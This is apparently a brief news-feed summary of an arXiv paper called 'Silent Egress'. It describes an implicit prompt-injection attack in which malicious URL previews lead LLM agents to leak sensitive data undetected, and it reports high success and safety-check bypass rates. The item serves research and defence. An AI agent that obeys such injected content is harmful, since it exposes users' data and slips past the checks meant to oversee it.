AIBearisharXiv โ CS AI ยท Feb 277/105
๐ง
Silent Egress: When Implicit Prompt Injection Makes LLM Agents Leak Without a Trace
Researchers discovered a new vulnerability called 'silent egress' where LLM agents can be tricked into leaking sensitive data through malicious URL previews without detection. The attack succeeds 89% of the time in tests, with 95% of successful attacks bypassing standard safety checks.